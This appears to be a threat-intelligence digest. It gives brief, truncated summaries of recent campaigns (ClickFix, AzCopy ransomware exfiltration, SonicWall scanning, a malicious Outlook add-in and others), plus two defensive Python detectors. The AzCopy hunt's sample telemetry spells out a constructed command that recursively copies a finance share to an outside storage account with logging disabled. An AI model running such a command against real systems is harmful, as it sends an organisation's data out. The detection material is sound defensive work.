- The Evolution of ClickFix: Inside ErrTraffic’s GlitchFix Attack Panel
  Observed in the wild: Censys researchers analysed ErrTraffic, a traffic-distribution system used in GlitchFix/ClickFix social-engineering attacks. They identified multiple live panels (v2 and v3) in the wild across various hosts, including one misconfigured instance that exposed the full source code. The tool targets global…
- AzCopy: Living off the Land Data Exfiltration in Modern Ransomware
  Observed in the wild: In incidents investigated and published by Varonis Threat Labs (March 2026), ransomware operators were observed exfiltrating large volumes of sensitive enterprise data using Microsoft’s AzCopy utility prior to encryption. Multiple victim organisations were impacted, with at least one confirmed case…
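A hunt for the AzCopy pattern described above, written as an added example (it is not Varonis' detection logic or any vendor rule). It assumes endpoint telemetry that records image path, command line, host and user (Sysmon/EDR style); the sample events, the host allowlist and the corporate storage-account list are all constructed for illustration. The logic flags AzCopy invocations that push a local path or UNC share to an Azure Blob URL, notes whether a SAS token was embedded in the command line and whether the copy was recursive, and skips hosts that are known to run AzCopy legitimately, since the tool itself is benign and the signal is the direction and context of the copy.

```python
"""Hunt for AzCopy-based exfiltration in process-creation telemetry.

Added example, not from the report above. Sample events, allowlists and
storage-account names are constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse, parse_qs

# Hypothetical environment knowledge: tune these per estate.
KNOWN_AZCOPY_HOSTS = {"bkp-srv01"}          # hosts that legitimately run AzCopy
KNOWN_STORAGE_ACCOUNTS = {"corpbackups01"}  # storage accounts the organisation owns

AZCOPY_UPLOAD_VERBS = {"copy", "cp", "sync"}
BLOB_HOST_RE = re.compile(r"\.blob\.core\.windows\.net$", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # split a Windows command line on quotes/whitespace


@dataclass
class Finding:
    host: str
    user: str
    account: str      # storage account that received the data
    source: str       # local path or UNC share that was uploaded
    sas_token: bool   # SAS token embedded in the destination URL
    recursive: bool   # whole directory tree copied
    reason: str


def _tokens(cmdline):
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def _is_blob_url(arg):
    try:
        parsed = urlparse(arg)
    except ValueError:
        return False
    return parsed.scheme == "https" and bool(BLOB_HOST_RE.search(parsed.hostname or ""))


def analyse_event(event):
    """Return a Finding for a local-to-Blob AzCopy upload, or None."""
    if not event["image"].lower().endswith("azcopy.exe"):
        return None
    argv = _tokens(event["cmdline"])
    if len(argv) < 4 or argv[1].lower() not in AZCOPY_UPLOAD_VERBS:
        return None
    positional = [a for a in argv[2:] if not a.startswith("-")]
    if len(positional) < 2:
        return None
    src, dst = positional[0], positional[1]
    # Only the upload direction matters here: downloads and blob-to-blob copies are ignored.
    if not _is_blob_url(dst) or _is_blob_url(src):
        return None
    if event["host"].lower() in KNOWN_AZCOPY_HOSTS:
        return None
    parsed = urlparse(dst)
    account = parsed.hostname.split(".")[0]
    reason = "AzCopy upload of local data to Azure Blob from a non-allowlisted host"
    if account not in KNOWN_STORAGE_ACCOUNTS:
        reason += "; destination storage account is not corporate"
    return Finding(
        host=event["host"], user=event["user"], account=account, source=src,
        sas_token="sig" in parse_qs(parsed.query),
        recursive=any(a.lower().startswith("--recursive") for a in argv),
        reason=reason,
    )


def hunt(events):
    return [f for f in (analyse_event(e) for e in events) if f is not None]


# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    {"host": "bkp-srv01", "user": "CORP\\svc_backup", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Backups\daily" "https://corpbackups01.blob.core.windows.net/daily?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "fs01", "user": "CORP\\jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\azcopy.exe",
     "cmdline": r'azcopy.exe copy "\\fs01\Finance" "https://xk9stagingdata.blob.core.windows.net/out?sv=2022-11-02&ss=b&sig=REDACTED" --recursive=true --log-level=NONE'},
    {"host": "ws-022", "user": "CORP\\abrown", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "https://corpbackups01.blob.core.windows.net/daily/report.zip" "C:\Users\abrown\Downloads\report.zip"'},
    {"host": "ws-023", "user": "CORP\\cgreen", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy C:\Data \\fs01\Share /E"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Only the second constructed event is reported: a user-profile copy of AzCopy pushing a finance share, recursively, with a SAS token, to a storage account the organisation does not own. The backup server is suppressed by the allowlist and the download on ws-022 is ignored because the data flows the other way. In production the same logic belongs on a volume metric too (bytes sent to *.blob.core.windows.net per host per hour), since an attacker can rename the binary; the original file name in the PE header or a hash match is the more robust process-level key.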
- Iran-Aligned Hacktivists and APTs Increase Low-to-Medium-Impact Cyber Attacks
  Observed in the wild: From 28 February, Unit 42 observed a sharp escalation in Iran-linked cyber activity following U.S. and Israeli military operations. Government, critical infrastructure, energy, healthcare and logistics organisations in the U.S., Israel and allied regions were primarily targeted, largely by hacktivist…
- Coordinated Proxy-Based Scanning Targets SonicWall Firewalls
  Observed in the wild: Between 22 and 25 February, GreyNoise observed a coordinated reconnaissance campaign generating 84,142 scanning sessions from 4,305 unique IPs, targeting internet-exposed SonicWall SonicOS firewalls, specifically organisations running SSL VPN services. The activity was global, highly structured, and…
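The figures above (84,142 sessions from 4,305 IPs) describe the classic distributed-scanning shape: many sources, few sessions each, all within a short window, which a per-source rate limit or brute-force rule never sees. The detector below is an added example, not GreyNoise's method or a SonicWall feature. It works on generic connection records (timestamp, source IP, destination port) that are constructed here; the SSL VPN port 4433 and the thresholds are assumptions to tune against your own baseline. It buckets sessions into fixed windows and alerts when a window has an unusual number of distinct sources with a low median session count per source.

```python
"""Detect distributed (many-source, low-rate) scanning of an exposed service.

Added example, not from the report above. Records, port and thresholds are
constructed/assumed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median

SSL_VPN_PORT = 4433  # assumed SonicWall SSL VPN listener; adjust to your config


@dataclass
class ScanAlert:
    window_start: datetime
    distinct_sources: int
    total_sessions: int
    median_sessions_per_source: float


def detect_distributed_scan(records, window_minutes=10, min_sources=50,
                            max_median_sessions=5, port=SSL_VPN_PORT):
    """records: iterable of (datetime, src_ip, dst_port). Returns list of ScanAlert."""
    sessions_by_window = defaultdict(lambda: defaultdict(int))
    for ts, src_ip, dst_port in records:
        if dst_port != port:
            continue
        # Floor the timestamp to the start of its fixed-size window.
        start = ts - timedelta(minutes=ts.minute % window_minutes,
                               seconds=ts.second, microseconds=ts.microsecond)
        sessions_by_window[start][src_ip] += 1

    alerts = []
    for start in sorted(sessions_by_window):
        per_source = sessions_by_window[start]
        counts = list(per_source.values())
        med = median(counts)
        # Many sources each doing very little is the distributed-scan signature;
        # a single noisy source (high median, one IP) is a different rule's job.
        if len(per_source) >= min_sources and med <= max_median_sessions:
            alerts.append(ScanAlert(start, len(per_source), sum(counts), med))
    return alerts


def build_sample_records():
    """Constructed traffic: four legitimate remote users plus a 120-node proxy burst."""
    base = datetime(2026, 2, 23, 3, 0)
    recs = []
    for i, ip in enumerate(["192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.13"]):
        for k in range(12):  # reconnecting every 30 minutes over six hours
            recs.append((base + timedelta(minutes=30 * k + i), ip, SSL_VPN_PORT))
    for n in range(120):  # each exit node opens two sessions inside a four-minute burst
        ip = f"203.0.113.{n}"
        t = base + timedelta(hours=2, seconds=2 * n)
        recs.append((t, ip, SSL_VPN_PORT))
        recs.append((t + timedelta(seconds=30), ip, SSL_VPN_PORT))
    return recs


if __name__ == "__main__":
    for alert in detect_distributed_scan(build_sample_records()):
        print(alert)
```

On the constructed data only the 05:00 window fires: 124 distinct sources (120 proxy nodes plus the four legitimate users who happened to reconnect then), 244 sessions, median two sessions per source. Against real firewall logs, set `min_sources` from the distinct-source count your VPN sees in a quiet window, and pair the alert with an enrichment step (ASN or known-proxy lists) before blocking, because the same shape also appears during a large legitimate reconnect storm after an outage.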
- ShinyHunters escalate vishing-led extortion across tech and telecoms
  Observed in the wild: In February, ShinyHunters-linked activity targeted Optimizely, a global ad-tech firm, via a contained breach of internal business systems, and Dutch telecoms provider Odido, where attackers exfiltrated customer contact data affecting ~6.2 million users, later claiming up to 21 million records. Both…
- AgreeToSteal: First Malicious Outlook Add-In Abuses Microsoft Marketplace Trust
  Observed in the wild: In February, Koi Security disclosed AgreeToSteal, the first known malicious Microsoft Outlook add-in in the wild. A legitimate but abandoned scheduling add-in (“AgreeTo”), originally published in December 2022, was hijacked, leading to the theft of over 4,000 Microsoft account credentials (and some…
- Malicious Next.js Repositories Used to Target Developers via Staged C2
  Observed in the wild: In February, Microsoft identified a coordinated campaign targeting software developers, particularly those using Next.js and Node.js. Targets were lured via fake technical assessments and seemingly legitimate repositories on public code-hosting platforms. Execution typically occurred during routine…
- APT28 Exploits Office Macros and Webhooks in Operation MacroMaze
  Observed in the wild: LAB52 reported Operation MacroMaze, an APT28-attributed campaign active from late September 2025 to January 2026, targeting specific entities in Western and Central Europe. Victims received highly targeted spear-phishing emails carrying malicious Microsoft Word documents designed to appear legitimate,…
- VS Code and Browser Extension Malware Targets Developers Through AI Tools and Stanley Kit
  Observed in the wild: MaliciousCorgi, a campaign discovered in January 2025, deployed malicious VS Code extensions disguised as AI coding assistants (including "ChatGPT – 中文版" and "ChatMoss (CodeMoss)") that infected approximately 1.5 million developers globally. Separately, the Stanley malware kit has been active since…
- Spam Campaign Abuses Atlassian Jira, Targets Government and Corporate Entities
  Observed in the wild: Between late December and late January 2026, threat actors abused Atlassian Jira Cloud to send spam and scam emails to government bodies and corporate organisations worldwide, particularly those already using Jira. Messages appeared as legitimate Jira notifications and were localised across multiple…